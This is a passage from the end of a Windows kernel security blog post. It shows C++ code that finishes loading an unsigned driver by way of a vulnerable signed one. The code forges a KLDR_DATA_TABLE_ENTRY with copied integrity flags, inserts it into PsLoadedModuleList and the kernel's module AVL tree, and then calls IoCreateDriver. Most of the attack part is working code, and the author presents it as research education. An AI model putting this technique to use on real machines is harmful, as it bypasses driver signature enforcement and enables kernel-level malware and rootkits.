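struct UnicodeString64 { std::uint16_t Length; std::uint16_t MaximumLength; std::uint64_t Buffer; };  // 0x10 bytes
struct BalancedNode64  { std::uint64_t Children[2]; std::uint64_t ParentValue; };                     // 0x18 bytes

// Fixed-width mirror of the extended KLDR_DATA_TABLE_ENTRY shown above
struct KldrEntryMirror
{
    ListEntry64     InLoadOrderLinks;       // 0x0
    std::uint64_t   ExceptionTable;         // 0x10
    std::uint32_t   ExceptionTableSize;     // 0x18
    std::uint64_t   GpValue;                // 0x20
    std::uint64_t   NonPagedDebugInfo;      // 0x28
    std::uint64_t   DllBase;                // 0x30
    std::uint64_t   EntryPoint;             // 0x38
    std::uint32_t   SizeOfImage;            // 0x40
    UnicodeString64 FullDllName;            // 0x48
    UnicodeString64 BaseDllName;            // 0x58
    std::uint32_t   Flags;                  // 0x68
    std::uint16_t   LoadCount;              // 0x6c
    std::uint16_t   u1;                     // 0x6e
    std::uint64_t   SectionPointer;         // 0x70
    std::uint32_t   CheckSum;               // 0x78
    std::uint32_t   CoverageSectionSize;    // 0x7c
    std::uint64_t   CoverageSection;        // 0x80
    std::uint64_t   LoadedImports;          // 0x88
    std::uint64_t   Spare;                  // 0x90
    std::uint32_t   SizeOfImageNotRounded;  // 0x98
    std::uint32_t   TimeDateStamp;          // 0x9c
    std::uint64_t   unknown[9];             // 0xa0, the hand-rolled padding
    BalancedNode64  atlNode;                // 0xe8
};

// If any of these fire, the padding no longer puts the node where the kernel expects it
static_assert(offsetof(KldrEntryMirror, DllBase) == 0x30, "DllBase moved");
static_assert(offsetof(KldrEntryMirror, SizeOfImage) == 0x40, "SizeOfImage moved");
static_assert(offsetof(KldrEntryMirror, unknown) == 0xa0, "padding start moved");
static_assert(offsetof(KldrEntryMirror, atlNode) == 0xe8, "AVL node is not at 0xE8");
static_assert(sizeof(KldrEntryMirror) == 0x100, "unexpected total size");
```

The same static_assert lines can be dropped next to the real structure in the driver, where a silent layout change would otherwise only show up as a bugcheck.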

And the code for inserting ourselves into both of these structures is as follows:

// Let's start with the PsLoadedModuleList insertion

// We need to look up some publicly exported symbols which can be done using MmGetSystemRoutineAddress
UNICODE_STRING psLoaded = RTL_CONSTANT_STRING(L"PsLoadedModuleList");
UNICODE_STRING psResource = RTL_CONSTANT_STRING(L"PsLoadedModuleResource");

// PsLoadedModuleList is the list head
_KLDR_DATA_TABLE_ENTRY* PsLoadedModuleList = reinterpret_cast<_KLDR_DATA_TABLE_ENTRY*>(MmGetSystemRoutineAddress(&psLoaded));
// PsLoadedModuleResource is the ERESOURCE structure which is essentially a reader/writer lock for the PsLoadedModuleList 
// You can read about ERESOURCE structures here: https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-eresource-routines
PERESOURCE PsLoadedModuleResource = reinterpret_cast<PERESOURCE>(MmGetSystemRoutineAddress(&psResource));

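// Lock the ERESOURCE exclusively because we're about to modify the list, a shared acquire is only suitable for readers.
// Note the documentation requires normal kernel APC delivery to be disabled while acquiring an ERESOURCE,
// e.g. by wrapping the acquire and release in KeEnterCriticalRegion/KeLeaveCriticalRegion.
ExAcquireResourceExclusiveLite(PsLoadedModuleResource, TRUE);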

// Allocate our own KLDR_DATA_TABLE_ENTRY structure
_KLDR_DATA_TABLE_ENTRY* ldrDataTableEntry = reinterpret_cast<_KLDR_DATA_TABLE_ENTRY*>(ExAllocatePool2(POOL_FLAG_NON_PAGED, sizeof(_KLDR_DATA_TABLE_ENTRY), 'xxxx'));

// Set our dll base address
ldrDataTableEntry->DllBase = &__ImageBase;
// Set our size of image
ldrDataTableEntry->SizeOfImage = pNtHeader->OptionalHeader.SizeOfImage;
/*
    Set some flags:
    
    I believe these were mostly copied from a legit set of flags from a real structure in an attached kernel debugger but 
    I think the key flag here is 0x20 which is some integrity check bit flag, although these are rather undocumented. From
    what I could find this flag apparently indicates that the driver was built with the /INTEGRITYCHECK linker flag which in turn
    sets the dll characteristic IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY which tells the memory manager to check for a digital
    signature in order to load the image in Windows. In any case, it's required to pass some Kernel API checks.
*/
ldrDataTableEntry->Flags = 0x49104020;

// Insert ourselves into the PsLoadedModuleList doubly linked list
InsertTailList(&PsLoadedModuleList->InLoadOrderLinks, &ldrDataTableEntry->InLoadOrderLinks);

// Right, now let's get ourself inserted into the AVL tree
UNICODE_STRING rtlAvlInsert = RTL_CONSTANT_STRING(L"RtlAvlInsertNodeEx");
using fnRtlAvlInsertNodeEx = VOID(NTAPI*)(RTL_BALANCED_NODE** Tree, RTL_BALANCED_NODE* Parent, BOOLEAN Right, RTL_BALANCED_NODE* Node);
fnRtlAvlInsertNodeEx pfnRtlAvlInsertNodeEx = reinterpret_cast<fnRtlAvlInsertNodeEx>(MmGetSystemRoutineAddress(&rtlAvlInsert));

// We now have the function to insert ourself but we have to do the work to figure out where we're supposed to be inserted

// Grab a pointer to the tree root using the rva in our kernel offsets structure
// (offsets is the KernelOffset entry returned by LookupKernel(hash), not the _KernelOffsets table itself)
void* pAvlTreeRoot = reinterpret_cast<void*>(reinterpret_cast<char*>(pNtosBase) + offsets.rvaAvlTreeRoot);

// Save off the tree root in pNode and set our iterator there too
RTL_BALANCED_NODE* pNode = *reinterpret_cast<RTL_BALANCED_NODE**>(pAvlTreeRoot);
RTL_BALANCED_NODE* iterator = pNode;
// We also need a spare iterator for a look-ahead
RTL_BALANCED_NODE* iteratorSpare = nullptr;
// Keep track of which branch of the tree we need insertion into
BOOLEAN right = FALSE;

// Let's walk the tree
while (TRUE)
{
    // Grab the KLDR_DATA_TABLE_ENTRY structure corresponding to this node
    _KLDR_DATA_TABLE_ENTRY* pLdrData = CONTAINING_RECORD(iterator, _KLDR_DATA_TABLE_ENTRY, atlNode);
    
    // Grab the image base and image size
    VOID* imageBase = pLdrData->DllBase;
    ULONG imageSize = pLdrData->SizeOfImage;
    
    // Compute the comparator for figuring out which branch we need to go down
    VOID* comparator = reinterpret_cast<UCHAR*>(imageBase) + imageSize - 1;

    if (&__ImageBase <= comparator)
    {
        /*
            The kernel checks to see if the image base being inserted is >=
            to the image base but <= image end address of the current node
            because that would indicate something is being added again.

            Because we're adding ourselves and we know we're not already in the tree
            we're going to assume that being <= to the image end address indicates
            we're at a lower memory address than the current node because we're sure
            we're not the current node
        */

        // Move left in the tree
        iteratorSpare = iterator->Left;

        if (NULL == iteratorSpare)
        {
            // We've moved to an empty left node so when we insert
            // indicate that we want to insert into the left spare
            right = FALSE;
            break;
        }
    }
    else
    {
        // We must be loaded at a higher address so move right
        iteratorSpare = iterator->Right;

        if (NULL == iteratorSpare)
        {
            // We've moved to an empty right node so when we insert
            // indicate that we want to insert into the right spare
            right = TRUE;
            break;
        }
    }

    // Actually advance the iterator now we've done the forward lookahead
    iterator = iteratorSpare;
}

// We found an empty slot to insert ourselves into so let's call RtlAvlInsertNodeEx!
// Here we pass the tree root, the node we want to be inserted into, a bool indicating which child to be connected to i.e. left or right
// and finally the node of our own new fake KLDR_DATA_TABLE_ENTRY.
pfnRtlAvlInsertNodeEx(reinterpret_cast<RTL_BALANCED_NODE**>(pAvlTreeRoot), iterator, right, &ldrDataTableEntry->atlNode);
    
// Finally release the ERESOURCE lock
ExReleaseResourceLite(PsLoadedModuleResource);
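The descent logic is the fiddly part of that listing, so here is a minimal user-mode model of just the walk: find the parent node and which side to attach to, keyed on image address ranges. All names are hypothetical. Link performs a plain attach with no rebalancing, which is the part RtlAvlInsertNodeEx does for real, so this models the search only.

```cpp
#include <cstddef>
#include <cstdint>

// Intrusive tree node, embedded inside the module entry like the kernel does
struct Node
{
    Node* Left;
    Node* Right;
};

struct ModuleEntry
{
    std::uint64_t base;
    std::uint32_t size;
    Node node;
};

// Same idea as CONTAINING_RECORD: step back from the embedded node to its owning entry
ModuleEntry* EntryFromNode(Node* n)
{
    return reinterpret_cast<ModuleEntry*>(reinterpret_cast<char*>(n) - offsetof(ModuleEntry, node));
}

struct InsertPoint
{
    Node* parent;  // node that will become our parent
    bool right;    // true to attach as the right child, false for the left
};

// Walk from the root until we fall off the tree, remembering the last node and direction.
// Precondition: root is non-null and newBase is not inside any existing module.
InsertPoint FindInsertPoint(Node* root, std::uint64_t newBase)
{
    Node* it = root;

    while (true)
    {
        ModuleEntry* entry = EntryFromNode(it);
        std::uint64_t lastByte = entry->base + entry->size - 1;

        bool goRight = !(newBase <= lastByte);
        Node* next = goRight ? it->Right : it->Left;

        if (next == nullptr)
        {
            return InsertPoint{it, goRight};
        }

        it = next;
    }
}

// Plain attach without rebalancing, only so the example can build a small tree
void Link(const InsertPoint& where, Node* child)
{
    if (where.right)
    {
        where.parent->Right = child;
    }
    else
    {
        where.parent->Left = child;
    }
}
```

For example, with modules at 0x3000 (root), 0x1000 and 0x6000, each 0x1000 bytes long, a new module at 0x2000 ends up as the right child of the 0x1000 module, and one at 0x5000 as the left child of the 0x6000 module.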

Okay, that’s it! At this point we should be inserted in both the AVL tree and the doubly-linked list structures representing all loaded kernel modules. Finally, we can call IoCreateDriver!

UNICODE_STRING ioCreate = RTL_CONSTANT_STRING(L"IoCreateDriver");
using fnIoCreateDriver = NTSTATUS(NTAPI*)(PUNICODE_STRING DriverName, DRIVER_INITIALIZE InitializationFunction);
fnIoCreateDriver pfnIoCreateDriver = reinterpret_cast<fnIoCreateDriver>(MmGetSystemRoutineAddress(&ioCreate));

// Passing a name isn't mandatory, remember, objects managed by the object manager don't have to have a name
// & given we talk to the driver via the device's symbolic link this is fine. Finally here we can pass it the
// address of our actual DriverEntry routine to be called properly
pfnIoCreateDriver(nullptr, &DriverEntry);

Wooo, we’re done! 🥳

That’s it, we’re finally done! We’ve loaded an unsigned driver into kernel using a vulnerable driver!

It’s honestly taken me so long to write all of this knowledge and process up, so thank you to any readers that made it this far. I really hope you gained/learned something from this blog and I fully appreciate that it’s almost a novel at this point, so getting this far is no easy feat. If you did make it this far please don’t hesitate to reach out to me via email and let me know your thoughts: was there anything I missed or got wrong, anything I skipped over too much and wasn’t clear, etc. Anyway, thank you, and congratulations on making it through this behemoth of a blog post!

Catch you next time when I’ll be back with something a bit more short form for my own sanity!

The Malware Man

A security researcher who specialises in Windows